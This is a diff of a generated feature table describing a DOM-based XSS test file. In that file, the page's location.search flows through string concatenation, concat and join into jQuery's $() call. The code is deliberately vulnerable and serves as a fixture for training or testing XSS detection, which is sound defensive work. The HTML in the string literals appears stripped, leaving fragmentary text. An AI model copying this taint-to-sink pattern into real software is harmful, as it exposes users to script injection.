    ")) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:2:11:45 | $("
    ")) | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:2:11:45 | exceptional return of $("
    ")) | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:2:11:45 | exceptional return of $("
    ")) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:2:11:45 | exceptional return of $("
    ")) | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:2:11:45 | exceptional return of $("
    ")) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:2:11:45 | exceptional return of $("
    ")) | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:4:11:15 | "
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:4:11:15 | "
    ' | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:4:11:22 | "
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:4:11:22 | "
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:4:11:31 | "
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:4:11:31 | exceptional return of "
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:4:11:38 | "
    ") | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:4:11:44 | "
    ") | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:4:11:44 | "
    ") | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | @@ -18370,6 +125498,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:4:11:44 | "
    ") | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:4:11:44 | "
    ") | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:4:11:44 | "
    ") | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:4:11:44 | exceptional return of "
    ") | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:4:11:44 | exceptional return of "
    ") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:4:11:44 | exceptional return of "
    ") | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:4:11:44 | exceptional return of "
    ") | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:4:11:44 | exceptional return of "
    ") | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:17:11:22 | concat | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:17:11:22 | concat | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:17:11:22 | concat | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:17:11:22 | concat | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:17:11:22 | concat | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:24:11:30 | tainted | CalleeFlexibleAccessPath | ?.concat | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:24:11:30 | tainted | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:24:11:30 | tainted | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | @@ -18378,6 +125516,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:24:11:30 | tainted | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:24:11:30 | tainted | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:24:11:30 | tainted | stringConcatenatedWith | '
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:33:11:38 | concat | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:33:11:38 | concat | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:40:11:43 | "/>" | CalleeFlexibleAccessPath | ?.concat().concat | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:40:11:43 | "/>" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:40:11:43 | "/>" | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | @@ -18386,6 +125529,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:40:11:43 | "/>" | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:40:11:43 | "/>" | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:11:40:11:43 | "/>" | stringConcatenatedWith | '
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:2:12:2 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:2:12:2 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:2:12:42 | $([" tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:2:12:42 | $([" tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:2:12:42 | exceptional return of $([""] | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:4:12:34 | ["
    "] | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:4:12:34 | ["
    "] | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:4:12:34 | ["
    "] | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:4:12:34 | ["
    "] | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:4:12:39 | ["
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:4:12:39 | ["
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:4:12:41 | ["
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:4:12:41 | exceptional return of ["
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:5:12:16 | "
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:5:12:16 | "
    ' | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:19:12:25 | tainted | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:19:12:25 | tainted | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:19:12:25 | tainted | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:19:12:25 | tainted | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:19:12:25 | tainted | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:19:12:25 | tainted | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:19:12:25 | tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:19:12:25 | tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:19:12:25 | tainted | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:19:12:25 | tainted | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:19:12:25 | tainted | stringConcatenatedWith | '
    ' | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:28:12:33 | "\\"/>" | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:28:12:33 | "\\"/>" | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:28:12:33 | "\\"/>" | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:28:12:33 | "\\"/>" | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:28:12:33 | "\\"/>" | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:28:12:33 | "\\"/>" | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:28:12:33 | "\\"/>" | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:28:12:33 | "\\"/>" | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:28:12:33 | "\\"/>" | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:28:12:33 | "\\"/>" | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:28:12:33 | "\\"/>" | stringConcatenatedWith | '
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:36:12:39 | join | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:12:36:12:39 | join | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:2:14:1 | this | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:2:14:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:2:14:1 | this | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:2:14:1 | this | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:2:14:1 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:2:16:2 | 'arguments' object of function indirection1 | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:2:16:2 | 'arguments' object of function indirection1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:2:16:2 | 'arguments' object of function indirection1 | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:2:16:2 | 'arguments' object of function indirection1 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:2:16:2 | 'arguments' object of function indirection1 | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:2:16:2 | exceptional return of function indirection1 | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:2:16:2 | exceptional return of function indirection1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:2:16:2 | exceptional return of function indirection1 | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:2:16:2 | exceptional return of function indirection1 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:2:16:2 | exceptional return of function indirection1 | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:2:16:2 | functio ... v>';\\n\\t} | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:2:16:2 | functio ... v>';\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:2:16:2 | functio ... v>';\\n\\t} | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:2:16:2 | functio ... v>';\\n\\t} | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:2:16:2 | functio ... v>';\\n\\t} | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:2:16:2 | return of function indirection1 | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:2:16:2 | return of function indirection1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:2:16:2 | return of function indirection1 | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:2:16:2 | return of function indirection1 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:2:16:2 | return of function indirection1 | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:11:14:22 | indirection1 | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:11:14:22 | indirection1 | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:11:14:22 | indirection1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:11:14:22 | indirection1 | contextSurroundingFunctionParameters | (attrs) | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:11:14:22 | indirection1 | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:11:14:22 | indirection1 | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:11:14:22 | indirection1 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:11:14:22 | indirection1 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:11:14:22 | indirection1 | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:11:14:22 | indirection1 | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:24:14:28 | attrs | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:24:14:28 | attrs | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:24:14:28 | attrs | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:24:14:28 | attrs | contextSurroundingFunctionParameters | (attrs) | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:24:14:28 | attrs | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:24:14:28 | attrs | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:24:14:28 | attrs | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:24:14:28 | attrs | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:24:14:28 | attrs | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:14:24:14:28 | attrs | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:10:15:23 | '
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:10:15:23 | '
    ' + content + '
    ' | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:10:15:55 | '
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:10:15:55 | '
    ' | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:10:15:62 | '
    ' | contextSurroundingFunctionParameters | (attrs) | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:10:15:62 | '
    ' | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:10:15:62 | '
    ' | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:10:15:62 | '
    ' | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:10:15:72 | '
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:10:15:72 | '
    ' | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:10:15:83 | '
    ' | contextSurroundingFunctionParameters | (attrs) | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:10:15:83 | '
    ' | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:10:15:83 | '
    ' | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:10:15:83 | '
    ' | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:27:15:55 | (attrs. ... 'left') | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:27:15:55 | (attrs. ... 'left') | contextSurroundingFunctionParameters | (attrs) | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:27:15:55 | (attrs. ... 'left') | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:27:15:55 | (attrs. ... 'left') | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:27:15:55 | (attrs. ... 'left') | fileImports | | | autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:27:15:55 | (attrs. ... 'left') | stringConcatenatedWith | '
    ' + content + '
    ' | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:28:15:32 | attrs | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:28:15:32 | attrs | contextSurroundingFunctionParameters | (attrs) | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:28:15:32 | attrs | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:28:15:32 | attrs | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:28:15:32 | attrs | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:28:15:44 | attrs.defaultattr | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:28:15:44 | attrs.defaultattr | contextSurroundingFunctionParameters | (attrs) | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:28:15:44 | attrs.defaultattr | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:28:15:44 | attrs.defaultattr | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:28:15:44 | attrs.defaultattr | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:28:15:54 | attrs.d ... 'left' | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:28:15:54 | attrs.d ... 'left' | contextSurroundingFunctionParameters | (attrs) | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:28:15:54 | attrs.d ... 'left' | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
    $ indirection1 document location search attrs $ indirection2 document location search attrs | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:28:15:54 | attrs.d ... 'left' | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:28:15:54 | attrs.d ... 'left' | fileImports | | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:34:15:44 | defaultattr | contextFunctionInterfaces | indirection1(attrs)\nindirection2(attrs)\ntest() | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:34:15:44 | defaultattr | contextSurroundingFunctionParameters | (attrs) | +| autogenerated/Xss/DomBasedXss/various-concat-obfuscations.js:15:34:15:44 | defaultattr | enclosingFunctionBody | tainted document location search $
    tainted
    $
    tainted
    $
    concat tainted concat
    $
    tainted
    join $
    $
    $
    join indirection1 attrs
    content
    indirection2 attrs
    concat content concat
